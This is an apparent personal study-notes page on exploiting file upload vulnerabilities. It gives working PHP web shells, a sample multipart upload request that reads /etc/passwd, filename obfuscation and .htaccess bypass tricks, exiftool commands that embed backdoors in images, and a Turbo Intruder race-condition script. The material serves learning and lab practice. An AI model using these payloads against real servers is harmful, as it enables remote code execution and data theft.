☠️
smadi0x86 Playground
  • 💀Welcome to smadi0x86 Playground
    • 🍷Resources
    • 🚬Projects
    • 🎓Certifications
    • 📌Pinned
    • ❓Questions
    • 📞Contact
  • 🏞️Cloud Native
    • Docker
      • Quick Reference
      • Introduction
      • Containers
      • Images
      • Storage & Volumes
      • Security
      • Cheatsheet
    • Git
    • Serverless Framework
    • YAML
  • 🔨Software Engineering
    • System Design
    • Environment Variables
    • JSON Web Tokens
  • 👾Architecture
    • C Language
      • Introduction
      • Calling Conventions
      • GCC Compilation
      • Libraries & Linking
      • I/O
      • Files
      • Pointers
      • Dynamic Memory Allocation
      • Data Types
      • Strings Manipulation
      • Bit Manipulation
      • Pre-processors
      • Macros
      • Type Qualifiers
    • C/C++ Build Systems
      • Fundamentals for Linking
      • Symbolic Linking
      • Cross-Platform Compilation
      • CMake for Building and Linking
      • Shared Libraries
      • Dynamic Linking and Dependency Management
    • Operating Systems
      • OS & Architecture
      • Processes
      • CPU Scheduling
      • Memory Management
  • 🛩️Cyber Warfare
    • Flight Physics
    • Communication
      • PWM & PPM
      • MAVLink
  • 🏴‍☠️Offensive Security
    • Active Directory
      • Introduction
    • Web Attacks
      • Server Side
        • OS Command Injection
        • Information Disclosure
        • Directory Traversal
        • Business Logic
        • Authentication
        • File Upload
        • SSRF
      • Client Side
        • CSRF
        • XSS
    • Recon
      • Active
        • Host discovery
        • Nmap
        • Mass Scan
      • Passive
        • Metadata
      • Web Applications
        • Discovery
        • Subdomains & Directories
        • SSL Certs
        • CMS
        • WAF Detection
      • Firewall Evasion
  • Binary Exploitation
    • Stack Smashing
      • x86
      • x86_64
    • pwntools
      • Processes and Communication
      • Logging and Context
      • Cyclic
      • Packing
      • ELF
      • ROP
  • 😈Advanced Persistent Threat
    • C2
      • Sliver
    • Malware
      • Windows Internals
        • PEB
      • Academy
        • Basics
      • Sektor7
        • Essentials
  • 💌Certifications
    • AWS Certified Cloud Practitioner (CLF-C01)
      • Cloud Foundations
      • Domain 1: Cloud Concepts
      • Domain 2: Security and Compliance
      • Domain 3: Technology
      • Domain 4: Billing and Pricing
    • AWS Certified Solutions Architect - Associate (SAA-C03)
      • Foundation
    • Certified Kubernetes Administrator (CKA)
      • Core Concepts
      • Scheduling
      • Logging & Monitoring
      • Application Lifecycle Management
      • Cluster Maintenance
      • Security
      • Storage
      • Networking
      • Design Kubernetes Cluster
      • Kubernetes The Kubeadm Way
      • Troubleshooting
      • JSONPATH
      • Lightning Lab
      • Mock Exams
      • Killer Shell
    • Certified Kubernetes Security (CKS)
      • Foundation
      • Cluster Setup
      • Cluster Hardening
      • Supply Chain Security
      • Runtime Security
      • System Hardening
      • Killer Shell
    • (KGAC-101) Kong Gateway Foundations
      • Introduction to APIs and API Management
      • Introduction to Kong Gateway
      • Getting Started with Kong Enterprise
      • Getting Started with Kong Konnect
      • Introduction to Kong Plugins
  • 📜Blog Posts
    • Modern Solutions For Preventing Ransomware Attacks
Powered by GitBook
On this page
  • Exploiting
  • PHP web shell upload
  • Web shell upload via path traversal
  • Overriding the server configuration
  • Obfuscating file extensions
  • Web shell upload via extension blacklist bypass (upload malicious .htaccess file)
  • Remote code execution via polyglot web shell upload
  • Exploiting file upload race conditions
  • Exploiting file upload vulnerabilities without RCE
  1. Offensive Security
  2. Web Attacks
  3. Server Side

File Upload

Uploading a file on a website without validation.

File upload occurs when a web server allows users to upload files to its filesystem without validating.

"Content-Type" header:

  • Simple text like name, address: "application/x-www-form-url-encoded"

  • Large amounts of binary data, like image or a PDF: "multipart/form-data"

"Content-Disposition" header:

  • If request message body is split into separate parts, each part contains a "Content-Disposition" header, which provides some basic information about the input field.

  • And it has a "Content-Type" header which tells the server the MIME type of the data that was submitted using this input.

Exploiting

PHP web shell upload

// Send in a HTTP request body
<?php echo file_get_contents('/path/to/target/file'); ?>
// Send in a HTTP request body
<?php echo system($_GET['command']); ?>

// Usage in HTTP GET request
GET /example/exploit.php?command=id HTTP/1.1

Example:

// Edit HTTP request with "BurpSuit Proxy"
POST /my-account/avatar HTTP/1.1
Host: test.net
LOPLOP
Content-Type: multipart/form-data; boundary=---------------------------4714704787410783474211833593
Content-Length: 523
LOPLOP
-----------------------------4714704787410783474211833593
Content-Disposition: form-data; name="avatar"; filename="f.php"
Content-Type: image/png
<?php echo file_get_contents('/etc/passwd'); ?>
-----------------------------4714704787410783474211833593
Content-Disposition: form-data; name="user"
TEST
-----------------------------4714704787410783474211833593

Web shell upload via path traversal

// Send file upload request:
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"

Overriding the server configuration

Load a directory-specific configuration from a file and edit it:

  • IIS Server: "web.config"

  • Apache Server: ".htaccess"

Obfuscating file extensions

Most exhaustive blacklists can potentially be bypassed using classic obfuscation techniques.

In the "Content-Disposition" header, change the value of the filename parameter to:

Example:

Content-Disposition: form-data; name="avatar"; filename="exploit.php%00.jpg"

or

- exploit.pHp
- exploit.php.jpg
- exploit.php.
- exploit.p.phphp
- using the URL encoding (or double URL encoding) for dots: exploit%2Ephp
- Add semicolons or URL-encoded null byte characters before the file extension: exploit.asp;.jpg or exploit.asp%00.jpg
- using multibyte unicode characters like xC0 x2E, xC4 xAE or xC0 xAE

Web shell upload via extension blacklist bypass (upload malicious .htaccess file)

Send request which upload file to server in Burp Repeater then:

  • Change the value of the "filename" parameter to ".htaccess".

  • Change the value of the "Content-Type" header to "text/plain".

  • Replace payload with AddType application/x-httpd-php .l33t

  • Resend the request with your payload and its "filename" should be "exploit.l33t".

  • Now web shell was successfully uploaded.

Remote code execution via polyglot web shell upload

// This adds your PHP payload to the image's Comment field
$ exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/path/secret_file') . ' END'; ?>" icon.png -o polyglot.php
$ exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg

Exploiting file upload race conditions

Create a polyglot PHP/JPG file that is fundamentally a normal image, but contains your PHP payload in its metadata.

Example:

As you can see from the source code above, the uploaded file is moved to an accessible folder, where it is checked for viruses.

Malicious files are only removed once the virus check is complete. This means it's possible to execute the file in the small time-window before it is removed. To solve this challenge, we can use Turbo Intruder.

Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''  # Post web shell to run your payload

    request2 = '''<YOUR-GET-REQUEST>'''    # Get web shell output

    engine.queue(request1, gate='race1')
    
    for x in range(5):
        engine.queue(request2, gate='race1')

    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Exploiting file upload vulnerabilities without RCE

Uploading malicious client-side scripts

If you can upload HTML files or SVG images, you can potentially use tags to create stored XSS payloads.

Exploiting vulnerabilities in the parsing of uploaded files

You know that the server parses XML-based files, such as Microsoft Office .doc or .xls files, this may be a potential vector for XXE injection attacks.

PreviousAuthenticationNextSSRF

Last updated 8 months ago

🏴‍☠️
Page cover image